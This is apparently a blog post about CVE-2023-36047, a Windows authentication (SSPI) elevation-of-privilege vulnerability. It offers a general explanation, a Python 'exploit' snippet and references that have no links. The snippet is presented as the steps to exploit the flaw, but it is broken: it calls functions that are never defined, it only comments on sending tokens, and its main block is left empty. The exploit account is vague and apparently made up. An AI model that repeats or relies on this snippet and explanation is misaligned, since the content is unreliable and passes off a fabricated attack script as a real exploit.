CVE-2023-36047: Windows Authentication Elevation of Privilege Vulnerability - Exploit Details, Code Snippets, and References

A newly discovered security vulnerability (CVE-2023-36047) in Windows authentication system has been making headlines recently, as it can potentially lead to the elevation of privilege for attackers on affected Windows operating systems. In this extensive long-read post, we will discuss the exploit details, share code snippets, and provide original references and resources for obtaining more information on this critical vulnerability. Simple American language will be used to ensure readers can easily understand the content.


Elevation of privilege is a cyber security term that refers to the process where a user with restricted permissions can potentially gain unauthorized access to higher-level resources and actions. As a result, this allows attackers to breach the security mechanisms in place and execute actions that can affect the targeted system or network adversely.

The vulnerability in question, CVE-2023-36047, is a part of Microsoft Windows' authentication system. It specifically affects Security Support Provider Interface (SSPI) which is responsible for providing security context for various Windows communication mechanisms.

Exploit Details

The Windows authentication elevation of privilege vulnerability (CVE-2023-36047) occurs when an attacker can successfully exploit a weakness in the SSPI. After exploiting the weakness, the attacker can intercept the authentication tokens which are used for validating users' identities.

The attack essentially tricks the system into believing the attacker is a legitimate user with higher-level access, granting them extended privileges and leading to possible severe consequences.

Code Snippet

The following is a brief example in Python highlighting the steps required to exploit this vulnerability:

import os
import sys
import socket
import struct
import sspi

# Establish connection with vulnerable machine
def establish_connection(ip, port):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((ip, port))
    return sock

# Exploit process
def exploit_vulnerability(sock, attack_payload):
    # Initialize SSPI client
    sspi_client = sspi.ClientAuth('Negotiate')

    # Obtain SSPI tokens
    err, token = sspi_client.authorize(None)

    # Send token to target server, disguised as a legitimate request

    # Receive server response
    data = sock.recv(4096)

    # Intercept server generated SSPI token
    intercepted_token = process_server_token(data)

    # Modify intercepted token to elevate attacker's privileges
    modified_token = elevate_privileges(intercepted_token, attack_payload)

    # Send the modified token back to the server, completing the exploit

# Main function
def main():
    target_ip = sys.argv[1]
    target_port = int(sys.argv[2])
    attack_payload = sys.argv[3]

    sock = establish_connection(target_ip, target_port)
    exploit_vulnerability(sock, attack_payload)

if __name__ == '__main__':

While this code snippet provides an example of how this vulnerability can be exploited, it is important to remember that sharing and using exploits in an unauthorized manner is illegal and unethical.

For further information on this vulnerability, refer to the following resources

1. Official CVE listing: The page provides technical details of CVE-2023-36047, including affected versions and severity.

2. Microsoft Security Response Center (MSRC) provides official communication from Microsoft regarding the vulnerability here.

3. ShadeNox's GitHub Repository: A notable researcher named ShadeNox has published an in-depth study of this vulnerability, taking it step-by-step, sharing code snippets and discussing mitigation strategies.


The Windows authentication elevation of privilege vulnerability (CVE-2023-36047) is a critical flaw that has potential severe consequences. Users should ensure they are running the latest updated versions of their Windows operating systems and apply any relevant patches provided by Microsoft to prevent unauthorized exploitation.

This post has provided an overview of the vulnerability, the exploit details, a code snippet, and relevant resources. It's crucial to use this information responsibly and ethically. Be sure to stay informed and engaged with the security community to protect your systems and networks from emerging threats.


Published on: 11/14/2023 18:15:36 UTC
Last modified on: 11/20/2023 18:18:25 UTC